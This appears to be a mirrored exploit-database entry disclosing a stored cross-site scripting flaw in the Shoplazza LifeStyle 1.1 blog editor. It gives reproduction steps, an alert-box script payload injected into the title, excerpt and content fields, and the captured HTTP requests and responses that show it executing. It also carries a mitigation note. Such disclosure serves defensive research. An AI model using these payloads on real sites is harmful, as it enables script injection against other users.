header-logo
Suggest Exploit
vendor:
LifeStyle
by:
Andrey Stoykov
8.8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: LifeStyle
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE: a:shoplazza:lifestyle
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 20.04
2020

Shoplazza 1.1 – Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability exists in Shoplazza 1.1. An attacker can exploit this vulnerability by logging in as a normal user account, browsing to the 'Blog Posts' -> 'Manage Blogs' -> 'Add Blog Post' page, and entering a malicious payload in the 'Title' field. This will cause the payload to be stored in the application and executed when the page is loaded. This can be used to execute arbitrary JavaScript code in the context of the application.

Mitigation:

Input validation should be used to prevent malicious payloads from being stored in the application. Additionally, output encoding should be used to prevent malicious payloads from being executed.
Source

Exploit-DB raw data:

# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) 
# Exploit Author: Andrey Stoykov
# Software Link: https://github.com/Shoplazza/LifeStyle
# Version: 1.1
# Tested on: Ubuntu 20.04


Stored XSS #1:

To reproduce do the following:

1. Login as normal user account
2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"
3. Select "Title" and enter payload "><script>alert(1)</script>


// HTTP POST request showing XSS payload

PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1=
.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]

{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><s=
cript>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","c=
ontent":"<p>\"><script>alert(3)</script></p>"[...]


// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK
Content-Type: application/json; charset=3Dutf-8
[...]

{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\=
"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>=
alert(1)</script>"[...]


// HTTP GET request to trigger XSS payload

GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9=
.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC=
03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK=
Enfj9L49I HTTP/1.1
Host: test1205.myshoplaza.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]


// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK
Content-Type: text/html; charset=3DUTF-8
[...]

<meta name=3D"viewport" content=3D"width=3Ddevice-width,initial-scale=3D1,m=
inimum-scale=3D1,maximum-scale=3D1,user-scalable=3Dno,viewport-fit=3Dcover"=
>
<title>Title"><script>alert(1)</script></title>
<meta name=3D"keywords" content=3D"test1205">
[...]

--rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--

Navigation

Suggest Exploit

Services By CQR